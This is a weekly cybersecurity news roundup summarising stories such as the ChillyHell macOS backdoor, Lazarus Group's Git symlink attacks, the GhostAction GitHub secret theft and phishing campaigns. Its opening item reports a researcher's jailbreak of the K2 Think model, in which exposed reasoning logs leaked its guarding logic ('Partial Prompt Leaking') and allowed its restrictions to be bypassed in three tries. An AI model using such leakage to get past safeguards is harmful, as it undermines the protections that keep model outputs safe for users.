San Mateo, CA, September 15, 2025 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.
K2 Think AI jailbroken just days after release
Just two days after its Sept. 9 release, researchers have already demonstrated a jailbreak of K2 Think, a new large language model from the UAE’s Mohamed bin Zayed University of Artificial Intelligence and G42. Marketed as the “world’s most parameter-efficient advanced reasoning model,” K2 runs on 32 billion parameters yet claims reasoning and coding performance comparable to much larger systems like OpenAI’s o3 and DeepSeek’s R1. But Adversa AI’s Alex Polyakov showed that its radical transparency in the form of exposing detailed reasoning logs makes it easier to exploit. Using a flaw called Partial Prompt Leaking, Polyakov bypassed restrictions in just three attempts. “When the reasoning layer is visible, K2 is easier to map and jailbreak than typical models,” Polyakov told Dark Reading. “We didn’t need clever wordplay or advanced multi-step attacks; the system taught us how to beat it in three tries.” Read more.
ChillyHell malware exploits Apple’s notarization loophole
ChillyHell, a newly uncovered modular backdoor targeting macOS, has been active since at least 2021 but surfaced publicly in May 2025, according to Jamf researchers. The malware exploits Apple’s notarization process to appear legitimate, helping it evade detection by major antivirus tools. Delivered via compromised websites posing as productivity apps, ChillyHell profiles host systems before establishing dual-stage persistence through LaunchAgents or LaunchDaemons, with added resilience via shell profile injections. It further obscures activity by backdating timestamps to blend with legitimate system events. ChillyHell communicates with command-and-control servers over HTTP and DNS, supporting reverse shells, updates, and password brute-forcing. Read more.
Ransomware costs in education drop sharply
Ransomware demands and payments in the education sector have dropped sharply over the past year, according to a new report from Sophos. Average demands to lower education providers fell 74% from $3.85 million in 2024 to $1.02 million, while higher education demands plunged 80% to $697,000. Payments followed the same trend, with median payouts in lower education down 88% to $800,000 and higher education dropping from $4.41 million to $463,000. Sophos attributed the decline to stronger defenses, faster recovery, and improved negotiation. Recovery costs in higher education fell 77% to $900,000, while more attacks were stopped before data encryption. Phishing and exploited vulnerabilities remain leading attack vectors. Read more.
California, Connecticut, and Colorado crack down on data-privacy violations
A multi-state privacy enforcement sweep began this week, targeting companies that ignore consumer opt-out laws. Regulators in California, Connecticut, and Colorado, joined by the California Privacy Protection Agency, are investigating businesses that fail to process opt-out requests or recognize Global Privacy Control (GPC) signals. California Attorney General Rob Bonta stressed that companies must honor consumer rights to stop data sales, while Connecticut Attorney General William Tong warned that compliance is “non-negotiable.” GPC, a browser-based tool, automatically signals websites to halt data collection for sales or targeted ads, but many businesses evade the requirement. The sweep marks one of the largest efforts to enforce U.S. data privacy protections. Read more.
Lazarus Group uses Git symlink flaw in new attacks
Cybersecurity researchers have identified a sophisticated new phishing campaign by Lazarus Group that targets developers and crypto professionals through a Git symlink vulnerability. Instead of traditional malware, the attackers exploit how Git handles repository paths, embedding malicious post-checkout hooks within symbolic links to execute code during routine operations, evading standard scanners. The campaign begins with personalized messages on professional networking sites, inviting victims to mock technical interviews, prompting them to run a single Git clone command. The hidden Node.js backdoor siphons credentials, system information, and wallet data while maintaining persistence by cleaning project files. This operation combines social engineering with supply chain compromise, highlighting the risks posed when trusted development tools are weaponized. Read more.
APT41 targets U.S. trade officials in cyber-espionage campaign
The House Select Committee on China has issued an advisory regarding an “ongoing” cyber espionage campaign by the Chinese threat group APT41 targeting U.S. trade officials during 2025 negotiations. “These campaigns seek to compromise organizations and individuals involved in U.S.–China trade policy and diplomacy, including U.S. government agencies, U.S. business organizations, D.C. law firms and think tanks, and at least one foreign government,” the committee said. The attackers impersonated Congressman John Robert Moolenaar, the committee’s chair, in phishing emails crafted to trick recipients into opening malicious attachments. Moolenaar condemned the operation, calling it “another example of China’s offensive cyber operations designed to steal American strategy and leverage it against Congress, the Administration, and the American people.” “China firmly opposes and combats all forms of cyber attacks and cyber crime,” the Chinese embassy in Washington told Reuters in a statement. “We also firmly oppose smearing others without solid evidence.” Read more.
Hackers send 50,000+ phishing emails daily via Amazon SES
Researchers have uncovered a cybercriminal campaign abusing Amazon’s Simple Email Service (SES) to send over 50,000 phishing emails per day, transforming AWS’s bulk email tool into a large-scale attack platform. The operation relies on compromised AWS access keys, often leaked through misconfigured assets or exposed in code, which attackers use to escalate SES accounts out of “sandbox” mode via a novel multi-regional tactic. Victims are targeted with tax-themed lures directing them to credential-harvesting domains. Attackers verified attacker-controlled and weakly protected domains, deployed spoofed email addresses, and attempted automated privilege escalation. The campaign highlights how cloud services can be weaponized, underscoring the need for stricter monitoring of access keys and API activity. Read more.
ICE revives $2 million spyware contract with Paragon
ICE has revived a $2 million contract with Israeli spyware maker Paragon after nearly a year under a Biden administration “stop work order” meant to assess compliance with limits on commercial spyware use. Public records show the order was lifted on August 30, activating the deal for licenses, hardware, maintenance, and training. Paragon, which markets itself as an ethical alternative to NSO Group and others, faces scrutiny following revelations that its spyware, Graphite, was used against journalists and activists in Italy. Citizen Lab’s John Scott-Railton warned such tools “were designed for dictatorships, not democracies built on liberty and protection of individual rights,” highlighting ongoing concerns that U.S. agencies could expand controversial surveillance practices. Read more.
GhostAction attack on GitHub steals thousands of secrets
A large-scale GitHub supply chain attack has compromised 327 users and 817 repositories, with over 3,300 secrets stolen, according to GitGuardian. The campaign, dubbed “GhostAction,” began when a maintainer account tied to the FastUUID project was compromised, pushing a malicious GitHub workflow to exfiltrate tokens. “The attacker’s inaction during the three days following the initial compromise suggested FastUUID was not the primary target. Our investigation revealed a much larger operation,” said GitGuardian investigators. They then uncovered hundreds of similar commits across other projects, stealing DockerHub credentials, GitHub tokens, npm tokens, AWS keys, and database credentials. Some organizations saw their entire SDK portfolios affected. While 100 repositories have reverted changes, many remain at risk. GitGuardian has alerted GitHub, npm, and PyPI, warning that additional packages could soon be compromised. Read more.
Phishing scams spread through iCloud Calendar invites
Attackers are exploiting iCloud Calendar invites to deliver callback phishing scams that appear to come directly from Apple’s email servers, increasing their chances of bypassing spam filters. One victim received a legitimate-looking PayPal receipt for $599, urging them to call a listed number to dispute the charge. Once on the phone, scammers attempt to trick targets into granting remote access, enabling theft of funds, malware deployment, or data exfiltration. The phishing messages pass SPF, DKIM, and DMARC checks because they originate from Apple’s servers, lending credibility. Security experts warn that unexpected iCloud Calendar invites containing odd payment or account messages should be ignored or deleted to avoid compromise. Read more.
More cybersecurity news
- Last week’s news
- More cybersecurity news
- All articles sponsored by NetworkTigers
About NetworkTigers
NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.
